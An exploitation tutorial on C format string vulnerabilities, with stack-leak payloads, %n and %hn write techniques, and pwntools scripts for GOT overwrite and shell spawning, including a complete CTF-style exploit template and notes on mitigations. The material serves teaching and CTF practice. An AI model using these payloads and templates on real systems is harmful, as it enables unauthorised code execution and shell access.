Memory Corruption
Intermediate

Format String Vulnerabilities

Format string vulnerabilities occur when user-controlled input is passed as the format argument to functions like printf() instead of as data. Because the function interprets any conversion specifiers in that input, these bugs enable reading and writing arbitrary memory locations.

Impact

Format string bugs can lead to: information disclosure (stack/heap leaks), arbitrary memory writes, stack canary bypass, and ultimately remote code execution.

The Vulnerability

❌ Vulnerable Code

c
char buf[100];
fgets(buf, 100, stdin);
printf(buf);  // User controls format string!

✓ Safe Code

c
char buf[100];
fgets(buf, 100, stdin);
printf("%s", buf);  // Format string is fixed

Useful Format Specifiers

Specifier   Description                            Exploit Use
%x          Print hex (32-bit)                     Leak stack values
%lx         Print hex (64-bit)                     Leak stack values (x64)
%p          Print pointer                          Leak addresses
%s          Print string at address                Read arbitrary memory
%n          Write count of bytes printed so far    Arbitrary write!
%hn         Write that count as 2 bytes            Partial overwrite
%N$x        Direct parameter access                Read specific stack position

Reading the Stack

Basic Stack Leak

bash
# Input multiple %x to dump stack values
%x.%x.%x.%x.%x.%x.%x.%x

# Output shows stack contents:
# 0.64.f7fc4580.0.f7fc4580.ffffffff.deadbeef.41414141

# Using %p for cleaner pointer output (with 0x prefix)
%p.%p.%p.%p.%p.%p.%p.%p
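
A dump like this is easier to work with once it is split into numbered offsets. The following is a minimal sketch, assuming the leak is a dot-separated list of %x or %p values and that the marker is the 4-byte string AAAA; parse_stack_dump and find_marker are hypothetical helper names, not part of any library.

```python
def parse_stack_dump(output: str) -> list[int]:
    """Split a dot-separated %x/%p dump into integers (index 0 = offset 1)."""
    values = []
    for token in output.strip().split('.'):
        token = token.strip()
        # glibc prints "(nil)" for a null pointer with %p
        values.append(0 if token == '(nil)' else int(token, 16))
    return values


def find_marker(values: list[int], marker: int = 0x41414141):
    """Return the 1-based offset of the marker, or None if it is absent."""
    for offset, value in enumerate(values, start=1):
        if value == marker:
            return offset
    return None


# Sample output taken from the dump shown in this section
dump = '0.64.f7fc4580.0.f7fc4580.ffffffff.deadbeef.41414141'
print(find_marker(parse_stack_dump(dump)))  # 8
```

The 1-based numbering matches direct parameter access, so an offset of 8 here corresponds to %8$x.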

Direct Parameter Access

Use %N$x to directly access the Nth argument on the stack:

bash
# Read 6th value on stack (often where our input lands)
%6$x

# Read 10th value as pointer
%10$p

# Find where your input lands on the stack
AAAA%6$x%7$x%8$x%9$x%10$x
# Look for 41414141 (hex for AAAA)
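
The marker shows up as 41414141 because %x prints each 4-byte stack word as a little-endian integer on x86. A marker with distinct bytes makes the byte order visible. A minimal sketch, assuming a 32-bit little-endian target; marker_as_hex is a hypothetical helper name:

```python
import struct


def marker_as_hex(marker: bytes) -> str:
    """Hex string that %x prints for a 4-byte marker on little-endian x86."""
    if len(marker) != 4:
        raise ValueError('marker must be exactly 4 bytes')
    (word,) = struct.unpack('<I', marker)
    return format(word, 'x')


print(marker_as_hex(b'AAAA'))  # 41414141
print(marker_as_hex(b'ABCD'))  # 44434241
```

If only part of a distinct marker appears in one value and the rest in the next, the input is not word-aligned on the stack. Prepending one to three padding bytes usually fixes that.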

Finding Your Input Offset

python
from pwn import *

# Automated offset finder (assumes the target reads and echoes input in a loop)
def find_offset(p, max_offset=50):
    for i in range(1, max_offset):
        p.sendline(f'AAAA%{i}$x'.encode())  # pwntools expects bytes
        output = p.recvline()
        if b'41414141' in output:
            print(f'[+] Input found at offset {i}')
            return i
    return None

Information Leaks

Leaking Stack Canary

python
# Stack canary is usually at a fixed offset from buffer
# Find it by leaking stack values

# Example: canary at offset 15, leaked with the payload %15$p

# In pwntools exploit:
p.sendline(b'%15$p')
canary = int(p.recvline().strip(), 16)
print(f'[+] Leaked canary: {hex(canary)}')
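
When scanning many offsets, a quick plausibility check helps separate the canary from neighbouring pointers. On Linux with glibc the canary's least significant byte is zero. The sketch below relies on that property. It is a heuristic only, since a page-aligned pointer also ends in 00. looks_like_canary is a hypothetical helper, and the sample values are made up for illustration.

```python
def looks_like_canary(value: int, bits: int = 64) -> bool:
    """Heuristic: zero low byte, non-zero upper bytes, fits in the word size."""
    if value <= 0 or value >= (1 << bits):
        return False
    return (value & 0xff) == 0 and (value >> 8) != 0


# Hypothetical leaked values
print(looks_like_canary(0x3a5f9c1e7b2d4800))  # True
print(looks_like_canary(0x7ffff7a05bf7))      # False
```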

Leaking Libc Address

python
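# Return addresses on stack often point to libc
# __libc_start_main+X is commonly found

p.sendline(b'%41$p')  # Offset varies by binary
libc_leak = int(p.recvline().strip(), 16)

# Calculate libc base
# The leak is a return address inside __libc_start_main, not the symbol itself.
# Its offset is the symbol offset (nm -D libc.so.6 | grep __libc_start_main)
# plus the delta X seen in a debugger; the value below fits one libc build only.
libc_start_main_offset = 0x21bf7
libc_base = libc_leak - libc_start_main_offset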

print(f'[+] Libc base: {hex(libc_base)}')
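
A computed base is easy to sanity-check, because shared libraries are mapped at page-aligned addresses. The sketch below rejects a base whose low 12 bits are non-zero, assuming 4 KiB pages. compute_base is a hypothetical helper and the leak value is invented for illustration.

```python
PAGE_SIZE = 0x1000  # assumption: 4 KiB pages


def compute_base(leak: int, leak_offset: int) -> int:
    """Subtract the known offset and verify the result is page-aligned."""
    base = leak - leak_offset
    if base % PAGE_SIZE != 0:
        raise ValueError(f'base {hex(base)} is not page-aligned: '
                         'wrong offset or wrong libc version')
    return base


leak = 0x7ffff7a05bf7  # hypothetical leaked return address
print(hex(compute_base(leak, 0x21bf7)))  # 0x7ffff79e4000
```

A misaligned result usually means the offset belongs to a different libc build or the leaked value is not the pointer you expected.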

Leaking PIE Base

python
# Find return addresses to main binary
p.sendline(b'%43$p')  # Adjust offset
pie_leak = int(p.recvline().strip(), 16)

# Calculate base
leak_offset = 0x1234  # Offset of the leaked return address within the binary (from binary analysis)
pie_base = pie_leak - leak_offset

print(f'[+] PIE base: {hex(pie_base)}')

Arbitrary Write with %n

How %n Works

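The %n specifier writes the number of bytes printed so far to the address held in its corresponding argument, which printf treats as a pointer to int. Combined with padding (to control the count) and direct parameter access (to select which stack value is used as the pointer), this enables writing arbitrary values.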

Basic %n Write

python
from pwn import *

# Write value 0x64 (100) to address 0x0804c010
# (illustrative writable address; its packed bytes must not contain a null,
# because printf stops parsing the format string at the first null byte)
# Place target address on stack, then use %n

# 32-bit example:
# 1. Put address at offset 7 on stack
# 2. Print 100 bytes
# 3. %7$n writes 100 to address at offset 7

payload = p32(0x0804c010)  # Target address
payload += b'%96c'          # Print 96 more chars (100 total with addr)
payload += b'%7$n'          # Write to offset 7

# Verify: 4 (addr) + 96 = 100 bytes = 0x64 written
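
An address placed at the front of the payload is itself part of the format string, so a null byte inside it ends the string before any specifier is parsed. The sketch below checks a packed 32-bit address for such bytes. It assumes the input is read by fgets(), so a newline is treated as bad too. bad_byte_positions is a hypothetical helper.

```python
import struct

# NUL ends the format string; newline ends an fgets() read (assumed input path)
BAD_BYTES = b'\x00\n'


def bad_byte_positions(addr: int, bad: bytes = BAD_BYTES) -> list[int]:
    """Return indexes of problematic bytes in a packed little-endian address."""
    packed = struct.pack('<I', addr)
    return [i for i, byte in enumerate(packed) if byte in bad]


print(bad_byte_positions(0x08048000))  # [0]  leading NUL cuts the payload short
print(bad_byte_positions(0x0804c010))  # []
```

When the target address cannot avoid a bad byte, the usual workaround is to place the address after the format specifiers and adjust the parameter offset accordingly.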

Writing Large Values

A single %n write of a value such as 0xdeadbeef would require printing billions of characters. Use %hn (2 bytes) or %hhn (1 byte) to write in chunks:

python
from pwn import *

target_addr = 0x0804c010  # GOT entry or return address (packed bytes must not contain a null)
target_value = 0xdeadbeef

# Write 2 bytes at a time using %hn
# First write 0xbeef to target_addr
# Then write 0xdead to target_addr+2

low_bytes = target_value & 0xffff         # 0xbeef
high_bytes = (target_value >> 16) & 0xffff  # 0xdead

# Build payload (assuming input at offset 6)
payload = p32(target_addr)      # offset 6
payload += p32(target_addr + 2) # offset 7

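# Calculate padding (%hn stores only the low 16 bits of the count, so wrap modulo 0x10000)
first_write = (low_bytes - 8) % 0x10000             # 8 address bytes already printed
second_write = (high_bytes - low_bytes) % 0x10000   # additional chars after the first write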

payload += f'%{first_write}c%6$hn'.encode()
payload += f'%{second_write}c%7$hn'.encode()

print(payload)
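
The printed-byte counter only grows, so the half with the smaller value is normally written first. The following is a minimal sketch of that ordering for a 32-bit target, assuming the payload starts at stack argument offset and nothing is printed before it. hn_payload_32 is a hypothetical helper and 0x0804c010 is an illustrative address.

```python
import struct


def hn_payload_32(addr: int, value: int, offset: int) -> bytes:
    """Build a payload that writes a 32-bit value with two %hn writes."""
    payload = struct.pack('<II', addr, addr + 2)  # arguments offset, offset + 1
    printed = len(payload)                         # 8 bytes printed so far

    halves = [(value & 0xffff, offset), ((value >> 16) & 0xffff, offset + 1)]
    # Write the smaller half first so the counter only needs to increase
    for half, arg in sorted(halves):
        pad = (half - printed) % 0x10000           # wraps if half < printed
        if pad:
            payload += f'%{pad}c'.encode()
            printed += pad
        payload += f'%{arg}$hn'.encode()
    return payload


print(hn_payload_32(0x0804c010, 0xdeadbeef, 6))
```

For 0xdeadbeef the low half is written first. For a value such as 0x0804beef the high half (0x0804) is smaller, so the %7$hn write comes before %6$hn.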

Using pwntools fmtstr_payload

python
from pwn import *

# Automatic format string payload generation
context.arch = 'i386'  # or 'amd64'

# Find offset where input appears on stack
offset = 6

# Create payload to write value to address
payload = fmtstr_payload(offset, {
    0x0804c000: 0xdeadbeef,  # GOT overwrite
    0x0804c004: 0xcafebabe   # Multiple writes
})

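# On 64-bit, addresses contain null bytes; recent pwntools versions place them
# after the format specifiers so the string is not cut short.
# write_size ('byte', 'short' or 'int') sets how many bytes each write covers:
payload = fmtstr_payload(offset, {0x0804c000: 0xdeadbeef}, write_size='short')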

GOT Overwrite Attack

Overwrite a GOT entry to redirect function calls:

python
from pwn import *

elf = ELF('./vuln')
libc = ELF('./libc.so.6')

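p = process('./vuln')

# Leak libc address first
p.sendline(b'%41$p')
libc_leak = int(p.recvline().strip(), 16)
# 243 is the return-site delta for one specific libc build; verify it in a debugger
libc_base = libc_leak - libc.symbols['__libc_start_main'] - 243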

# Calculate system address
system_addr = libc_base + libc.symbols['system']

# Overwrite puts@got with system
puts_got = elf.got['puts']
offset = 6

payload = fmtstr_payload(offset, {puts_got: system_addr})
p.sendline(payload)

# Next call to puts() will call system() instead.
# This only yields a shell if the program passes attacker-controlled input to puts().
p.sendline(b'/bin/sh')
p.interactive()

Complete Exploit Template

fmt_exploit.py
python
#!/usr/bin/env python3
from pwn import *

context.arch = 'amd64'
context.log_level = 'info'

elf = ELF('./vuln')
libc = ELF('./libc.so.6')

# p = process('./vuln')
p = remote('pwn.ctf.com', 1337)

# Step 1: Find format string offset
# Send AAAAAAAA%p.%p.%p... and find where 0x4141414141414141 appears
FMT_OFFSET = 6

# Step 2: Leak addresses
# Leak libc (adjust offsets based on binary)
p.sendlineafter(b'> ', b'%41$p')
libc_leak = int(p.recvline().strip(), 16)
# 243 is the return-site delta for one specific libc build; verify it in a debugger
libc.address = libc_leak - libc.symbols['__libc_start_main'] - 243
log.info(f'Libc base: {hex(libc.address)}')

# Leak stack canary if needed
p.sendlineafter(b'> ', b'%15$p')
canary = int(p.recvline().strip(), 16)
log.info(f'Canary: {hex(canary)}')

# Step 3: Write exploit
# Overwrite return address or GOT entry
target = elf.got['puts']
value = libc.symbols['system']

payload = fmtstr_payload(FMT_OFFSET, {target: value})
p.sendlineafter(b'> ', payload)

# Step 4: Trigger (call puts with "/bin/sh")
p.sendlineafter(b'> ', b'/bin/sh')
p.interactive()

Mitigations & Bypasses

FORTIFY_SOURCE

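With _FORTIFY_SOURCE=2, glibc replaces printf with __printf_chk, which aborts if a format string stored in writable memory contains %n and rejects positional specifiers (%N$) that skip earlier arguments. Sequential %p and %s leaks still work.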

RELRO (Full)

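The GOT is mapped read-only after startup, so GOT overwrites fail. Target return addresses on the stack or, on glibc versions before 2.34, __malloc_hook instead. .fini_array lies in the same read-only RELRO region, so it is only a viable target when RELRO is disabled.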